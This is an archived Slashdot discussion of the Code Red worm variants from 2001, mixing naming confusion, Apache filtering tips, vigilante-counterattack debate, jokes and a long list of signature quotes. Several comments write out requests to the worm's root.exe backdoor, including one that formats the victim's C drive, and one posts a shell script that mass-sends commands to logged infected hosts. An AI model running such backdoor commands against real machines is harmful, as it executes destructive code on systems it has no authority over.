Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

Re:Bah.

[austad]

How about an apache box in front of the IIS server with mod_proxy installed and setup as a reverse proxy filtering out default.ida requests??

Versions of the worm...

[Moonshadow]

Code Red: A New Worm
Code Red: Microsoft Strikes Back
Code Red: Return of the Virii
Code Red: The Not-so Phantom Menace

And finally...

Code Red: Attack of the Clones

I want Code Red IV myself...

[QwkHyenA]

Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

More information?

[Dr.+Evil]

I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In otherwords, they're only figuring out now how bad Code Red II is.

Re:More information?

[ncc74656]

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

#!/bin/sh
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+ %22Your+w\
eb server+has+been+infected+with+the+CodeRed2+worm.+Y ou+have+a+security\
+h ole+so+big+that+you+can+drive+a+Mack+truck+through +it.+You+should+fi\
x+ it+before+some+script+kiddie+comes+along+and+takes +advantage+of+it.+\
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cs cripts+\(or+wherev\
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscri pts+is+the+default\
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done

Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

Re:More information?

[helleman]

Modified version to grep standard apache log Change the top to be the following: file:#!/bin/sh for i in `(grep default /var/log/httpd/access_log | cut -f1 -d- | sort | uniq )` do=

Re:More information?

[blakestah]

In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.


What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
Still has the XXX and installs the backdoor

Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

We can do it for them...

GET /script/root.exe?+%2fc+format+c:

Re:More information?

[pi_rules]

There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.

CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.

In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.

Justin Buist

Re:More information?

[ryanr]

The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

For people who are asking in other threads here, CRv1 and CRv2 uses NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

In any case, if someone is able to translate
this link
That would be a huge help.

Re:More information?

[BigBlockMopar]

We can do it for them...
GET /script/root.exe?+%2fc+format+c:

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

Perhaps we should reconsider...

[Rob+Mac+K]

I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

Thoughts?

Re:Perhaps we should reconsider...

[norton_I]

I have been seriously considering the "counterattach" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.

Re:An ETHICAL way to Anti-Virus

[nitehorse]

Actually, if you add a line in your httpd.conf that looks like this:

AddHandler cgi-script .ida

then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

AddType application/x-httpd-php .php .php3 .ida

Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

-Chris

Slashdot Humor

[Futurepower(tm)]

-

I've been making a list of the best of Slashdot humor. Here it is. In the beginning I did not record the user name:

Lotteries are a tax on people who suck at math.

"He that is wounded in the stones, or hath his privy member cut off, shall not enter into the congregation of the LORD." - Deuteronomy 23:1

The metric system is the tool of the devil!! i get forty rods to the hogshead, and that's the way i likes it!!

Someone had to put all that chaos there! by Greyfox (nride@uswest.net)

I love vegetarians - some of my favorite foods are vegetarians.

"Today's forecast calls for sprinkles of genius with a chance of doom!" - Stewie Griffin

The truth does not set you free, it just makes everyone irritable.

Which is worse: Ignorance or Apathy? Who knows? Who cares?

It's pretty funny, actually. It all started when I thought that inflammable was the opposite of flammable...

From a signature line at the end of every message: [Drink Coke] [Army - Be All You Can Be] [This ad space for sale! Contact the author for current rates]

"You can't have everything. Where would you keep it?" -- Steven Wright

A computer without a Microsoft operating system is like a dog without bricks tied to it's head. dieMSdie (steve@spam-is-bad.xtn.net)

"Science is like sex: sometimes something useful comes out, but that is not the reason we are doing it" -- Richard Feynman

This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com

Error: Cannot find file REALITY.SYS - Universe halted, please reboot! (NoSpam_Jonathan_Bayer@bigfoot.com)

It's sad to live in a world where knowing how to program your VCR actually lowers your social status... (rhopkins-at-crosswinds-dot-net)

Disclaimer: The opinions expressed in this post are not necessarily mine, as I've not yet had my medication today. (jmblant@clemson.dontsendmespam.edu)

When I have to develop under Windows, I spend long, frustrating days where mis-handling of a pointer causes BSOD, not a core dump. (Gen-GNU)

"Linux is a beautiful thing, but beauty is in the eye of the beholder, and we're geeks.

Be nice to your friends. If it weren't for them, you'd be a complete stranger. (Yamao)

The white zone is for loading and unloading only by error 404 on Mon Jun 12th, 2000 at 10:30:10 AM EST, kuro5hin

5.72 MOhms across my tongue... should i be concerned? MrResistor (mrresistor@hotmail.com) on Tuesday June 13, @03:38PM EDT (SD)

"Why does everyone always overgeneralize?" by p3d0 on Monday June 05, @12:37PM EDT (SD)

If at first you don't succeed, try a shorter bungee. by leonbrooks on Thursday June 15, @08:10PM EDT

-- Any attempt to brew coffee with a teapot should result in the error code "418 I'm a teapot". The resulting entity body MAY be short and stout. [RFC 2324] by Eric Green (eric@badtux.org) on Thursday June 15, @03:48PM EDT

The Internet interprets advertising as damage and routes around it. by Paul Crowley (slashdot-paul@cluefactory.org.uk)

There are two kinds of people in this world -- Those who divide people into two groups and those who don't. by YogSothoth (jdumas9@z3eh.com (s/[0-9]//g)) on Friday June 16, @08:22PM EDT

The Christian Right is Neither -- by cbuskirk (cbuskirk@yahoo.com) on Friday June 16, @07:35PM EDT

Inertia's what makes the world go 'round. -- by rana on Friday June 16, @07:54PM EDT

If you are angry with someone, you should walk a mile in their shoes... then you'll be a mile away from them, and you'll have their shoes. -- by hobbit (hamish@nutshell.SPAM.freeserve.SPAM.co.uk)

Fruit flies like bananas... Time flies like the wind... by DanBari on Tuesday June 20, @02:19AM EDT

Who is General Failure, and why is he reading my hard drive? mcelrath (mcelrath+slashdotcomment@draal.physics.wisc.edu)

"One World, one Web, one Program" - Microsoft promotional ad "Ein Volk, ein Reich, ein Fuhrer" - Adolf Hitler by Wakko Warner (wakko@qwerty.bitey.net) on Wednesday June 21, @09:25PM EDT

"'Tis some script kidd3z," I muttered, "tapping at my server port-Only this, and nothing more." by Barbarianconanford_please-no@spam-yahoo.com) on Thursday June 29, @07:11PM EDT

The early bird gets the worm, but the second mouse gets the cheese. warpathwarpath@the-cantina.com) on Thursday July 06, @06:13PM EDT

-o-"Warning: You are logged into reality as root..."-o- by Munky_v2email_me@www.dialug.org) on Friday July 07, @09:32AM EDT

There are three types of people in the world; those who can count, and those who can't. -- by Uruks2mdalle@titan.vcu.edu) on Monday July 10, @02:04PM EDT

All generalizations are false. -- by The_Messengerkmfms.com@drew) on Monday July 10, @04:07PM EDT

A theory: Women do not, snore, burp, sweat or fart. Therefore, they must bitch, or they will explode. -- byy m0nkeyb0y on Wednesday July 12, @01:34AM EDT

Why is it that it's a penny for your thoughts, but you have to put your two cents in? Somebody's makin a penny. --Steven Wright

I've lost my faith in nihilism. -- by hey!mattleo@treehouse.acrcorp.com) on Monday July 17, @10:08AM EDT

Being a geek means never having to ask, "Paper or plastic?" -- by Loligoljm@delete_this.fc.net) on Friday July 21, @01:40PM EDT

"Ah yes, the Tomahawk Cruise missle... the rich country's car bomb." -- by Rand Race (helixp@nospam.bellsouth.net) on Friday July 21, @03:29PM EDT

I am hypoallergenic, dermatologist tested, and dishwasher safe... -- by ecliptic_1 (ecliptic_1@spamsux.bigfoot.com) on Friday July 21, @09:49PM EDT

The problems that exist in the world today cannot be solved by the level of thinking that created them. -- Einstein

There is nothing more odious to me than an expensive church. -- by brogdonandrew(at)imagersoft.com) on Tuesday August 01, @02:58PM EDT#106)

"Bill Gates is just a monocle and a Persian Cat away from being one of the bad guys in a James Bond movie." - Dennis Miller

Bad spellers of the world, untie! -- by Fjord_Reddfjord_redd@programmer_dot_net) on Wednesday August 02, @10:43AM EDT#19)

Every night, tired dyslexics around the world look forward to 8 hours of peels. -- by sirinekbillHATESSPAM@sirinek.com) on Wednesday August 09, @12:45PM EDT#124) (User #41507 Info)http://www.sirinek.com

"I do know I'm ready for the job. And, if not, that's just the way it goes." G. W. Bush 8/21/2000

by NecroPuppy on Tuesday August 22, @10:51PM EDT#14) (User #222648 Info) A friend of mine has a barcode on his arm. He rings up as a $.35 pack of JuicyFruit.

Preserve Wildlife -- Pickle a squirrel today! by HydroCarbon10synth903@hotmail.com) on Thursday September 07, @10:48AM NT#23)

You know lately I've been thinking recently about the sig system. I really think that 120 characters seems a bit restr -- by Valar nospamyalusers.kungfoo@linuxstart.com) on Thursday September 07, @11:07AM NT#74) (User #167606 Info)

"Don't anthropomorphize computers. They hate that." -- by poiu on Thursday September 07, @10:50AM NT#124) (User #106484 Info)

5 out of 4 People have problems with fractions. -- by fjordboy noneofyourbeeswax@noneofyourbeeswax.com) on Sunday September 10, @07:16PM EDT#116) (User #169716 Info)http://www.iceball.net

Never miss a good chance to shut up. -- by Aleatoricrsanders@webzone.net) on Monday September 11, @03:15AM EDT#46) (User #10021 Info)

Give me ambiguity or give me something else -- Re:That last ten percent... (Score:2, Informative) by seanmeistersubsynthesis@subdimension.com) on Wednesday September 20, @04:37PM EDT#53) (User #156224 Info)

The music business is a cruel and shallow money trench, a long plastic hallway where thieves and pimps run free and good men die like dogs. There's also a negative side. - Hunter S Thompson

Apocalypse n. Writings from Jewish authors... designed to cheer the hearts of the Jewish people (Webster) -- My password... (Score:1) by MrScience on Friday September 29, @12:06PM EDT#221) (User #126570 Info)"

If at first you don't succeed, it is quite certain you will give up skydiving. -- Maybe it just crashed? (Score:2, Informative) by LilGuy on Wednesday October 04, @04:44PM EDT#54) (User #150110 Info)

I'm a dyslexic agnostic with insomnia... I lie awake at night wondering if there really is a dog! -- Re:Electoral College (Score:1) by Q-Hack!kc5aot_HATES_SPAM_@qsl.net) on Thursday October 19, @09:49AM PDT#23) (User #37846 Info)http://www.qsl.net/~kc5aot

Sponsored by: Chork Lite - Because having an active lifestyle doesn't mean you have to give up jellied meat. -- by Towertwrau.p.dueirml@eo) on Tuesday May 01, @01:03PM EST#60) (User #37395 Info)

I'm in search of myself. If you found me before I arrive, please have me wait. -- by jsse on Wednesday May 02, @09:50PM EST#63) (User #254124 Info)

"Time's fun when you're having flies." - Kermit the Frog -- by joshyboy on Wednesday May 02, @09:31PM EST#17) (User #237516 Info)

...A no smoking section in a resturant is like having a no peeing section in a swimming pool... -- From whats been happing..... (Score:1) by SGDarkKnight on Monday May 07, @11:51AM EST#30) (User #253157 Info)

I'm in search of myself. If you found me before I arrive, please have me wait. -- Very bad case for US (Score:2) by jsse on Thursday May 17, @03:40AM EST#11) (User #254124 Info)

Swearing is the crutch of inarticulate mother fuckers. -- whitehouse.gov. IN CNAME hongkonggov.cn (Score:1) by xodiakbrad AT geeknet DOT net) on Thursday July 19, @03:45PM PDT#15) (User #95699 Info)http://www.pander.org/

If Bill Gates had a nickel for every time Windows crashed... ..oh wait, he does. -- by Nate Fox (slashdotatdafox.org) on Friday August 10, @11:00AM PDT (#54) (User #1271 Info)

-

Stop addressing Code Red

[I_redwolf]

and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed. There is nothing significantly fascinating about this program that deserves any noteriarty. It didn't find some weird flaw in design. It just exploits a buffer overflow which has always been a problem in peoples code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.

The Code Red hype Hall of Shame

[wiredog]

From The Register

So hard to keep up

[snakecoder]

God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the lasted version on my IIS server?
Tnks.

Re:Microsoft should be sued

[IronChef]

I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.

My view is very simple: Things you buy shouldn't suck.

One problem....

[JohnTheFisherman]

People need to patch servers that don't know they're servers. I have RoadRunner (cable modem), and I looked at my logs, and decided to try and track a few people down via http://ipattackingme. Almost none of them had a website up - just the stock 'page under construction.' So I suspected (and RR tech suppt. confirmed this) that most of these people are running IIS and DON'T KNOW THEY'RE RUNNING IIS.

RoadRunner is additionally trying to shut down individual cable modems, rather than some of the more extreme measures other providers are using (like killing port 80), so kudos to them. Please get the word out to anyone running 2K or NT to check their box, not just anyone who KNOWS they're running a website.

Re:Microsoft should be sued

[Keith+Russell]

...I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth...

If you are a sysadmin responsible for any server, regardless of operating system, it's your job to be aware. Microsoft's poor record may drive up the frequency of patches, but that doesn't change the fact that the difference between a good sysadmin and a bad one is the knowledge that no server runs itself.

Re:Copycats

[Syberghost]

Get over it. Code Red is dead.

The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.

Use Open Source to Fight Code Red

[isn't+my+name]

Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and on RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01 368.html

As with the parent, so with the child.

[pmorrison]

It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

Saddens me though

[Hammer]

That Linux and Apache are not compatible.
We seem to have a good ways to go befoer everything that runs on Winblows will also run on Linux :-))

It's not like they haven't announced the patch

[mblase]

Remember the recent Ford Explorer/Firestone fiasco? Firestone made a bunch of flawed tires (when and where is not important here) that were put on these Explorer SUVs, which in some cases fell apart and came off the wheel when driving at high speeds. Investigations were made, and eventually Firestone had to issue a complete recall of the tires.

The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.

Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.

But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.

Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.

Re:make some money off banner ads

[TheMidget]

> host banner ads on your server with the file name of /default.ida.

Won't work. The worm won't follow redirects nor download any pictures (banners) from the page.

Version 3? Don't think so.

[Todd+Knarr]

My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.

Re:Microsoft should be sued

[Keith+Russell]

I bet it isn't that hard to do "accidentally"

Actually, it is. You are never offered the option during the initial installation (i.e. the moment you boot from the CD). You must wait until the entire installation is finished, then select "Add/Remove Windows Components" from the Add/Remove Programs control panel. From there, IIS can be selected. It is not selected by default.

Obviously,IIS is *vastly* more popular then apache

[Jerf]

They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations then anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.

IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.

Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.

"More lusers with vulnerable web servers then ever before - Microsoft Windows 2000."

An ETHICAL way to Anti-Virus

[Slur]

Hi,

I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

An example of the email I've been sending is this:

Hi,

Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


This is probably a very miniscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?

Serious blow to open source & free software

[Sloppy]

Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

I saw that Reuters story earlier

[GC]

but I have not seen any instances of attempted infection.

It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

make some money off banner ads

[SethJohnson]

Taco, I recommend you sign up with one of those online casino sites and host banner ads on your server with the file name of /default.ida. You should be able to rack up a few thousand unique page views a day by pointing the scourge at the scourge (ala Fist Full of Dollars).

Public Logfile - for *Educational* Purposes Only

[BigBlockMopar]

I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
should we set up a site somewhere of ip addrs?

Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a bliterhing idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.

Thanks for the suggestion

[WillSeattle]

I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

OK, it will be ready in an hour, just got to build the array handler routine.

Re:Please

[truthsearch]

If Microsoft can't even patch their own servers then how can anyone expect others to do it properly? The best solution (in the long run), is to switch to a server which has less vulnerabilities.

Microsoft should be sued

[Rosco+P.+Coltrane]

Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.

To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.

(of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)

Re:Microsoft should be sued

[Keith+Russell]

...most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software.

IIS doesn't even run on 9x, ME, or other spawn of 3.x. 2000 Professional* does not install IIS by default. Your Joe Schmoe must have either installed IIS after installing W2kPro, or installed W2k Server, which does install IIS automatically. Either way, he took deliberate action to make his PC a server, and with it, took on the responsibility of keeping that server up-to-date.

Claiming that Microsoft should be liable for sysadmins who are some combination of naive, out of touch, unqualified, or just plain stupid is like claiming that I can sue Honda because my parked car was sideswiped by an unlicensed, drunk driver who just happened to be in an Accord.

*: This also applies to NT 4.0.

Re:Microsoft should be sued

[blang]

Because we're not talking about admins, but gullible users. When I did a quick toor to the hacked sites in my apache log, most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software. Nobody ever told them that the software is considered harmful, and needs constant babysitting. Sounds like a good enough reason for a class action law suite to me.

Re:Microsoft should be sued

[cr0sh]

I can't count the number of times when patches have been applied to NT-based servers, only to have other server software (generally third-party) die after the patch is put into place.

Certainly, applying the patch is a necessary thing - but when you look at it from a business perspective, which is worse:

1. Apply the patch, have our other server stuff stop working (say, our lovely ASP stuff), and lose money - but save the rest of the internet.
2. Don't apply the patch - we keep making money - and screw everybody else - we will wait.

Suddenly, it all makes sense...

Finally

[nEoN+nOoDlE]

Sequels that are actually better than the original.

If the log hits aren't for you, do the right thing

[Darby]

and see that they go where they belong. I mean seriously, I've seen lot's of sites with a domain name which I thought was some other much more popular site which had a small link at the bottom saying something to the affect of: If you're looking for such and such they're actually located here.
It's just common courtesy provided it isn't a competitors site.

So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:

A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.

Re:Help me out on this one...

[DeadMeat+(TM)]

Code Red takes advantage of what's called a "buffer overflow" in Microsoft's IIS web server software.

What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.

Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everthing after that number of letters and runs it like it were a program.

Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.

Re:Bah.

[mjh]

I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

You might be interested in this article titled, "Securing an unpatchable webserver"

Re:Code Red is trying to eat me!

[garcia]

They probably understand the fact that there is VERY little that they can do (other than blocking port 80) than inform their users of what to do. At least they are giving "Worm? I have a worm in my computer? There's no dirt in there" guys the information.

As much as I hate Verizon and their bullshit, at least they are trying to do something.

Gotta give em SOME credit ;)

More info on Code Red III

[Sideways+The+Dog]

WARNING, VIRUS ALERT!!!

If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code,screw up the tracking on your VCR and use subspace fieldharmonic to scratch any CDs you try to play.

It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer.It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.

It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.

It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.

"Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows,and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!

Re:Bah.

[Syberghost]

No, this fun new version is "XXXXXXXX".

And the only thing I saw wrong in that report is that they believed the companies in question when they reported "isolated" problems that have already been fixed.

I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

The pisser is none of MY servers were affected, but I'm still dead in the water because of a bunch of idiots on other teams and projects.

Put it in another log and forget about it.

[Malc]

"I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

I'm not even sure how to spell regexe, but this is what I've attempted to do:

SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
CustomLog /var/log/apache/code-red-request.log common env=code-red-request
#CustomLog /var/log/apache/access.log common
CustomLog /var/log/apache/access.log common env=!code-red-request

RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1

Interesting Irony

[Naerbnic]

So, Three Code Reds and a SirCam later, the question just begs to be asked:

Who's calling Whose code "Potentially Viral"?

I think you're on to something...

[Nate+Fox]

According to Symantec's page on CR2:

Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C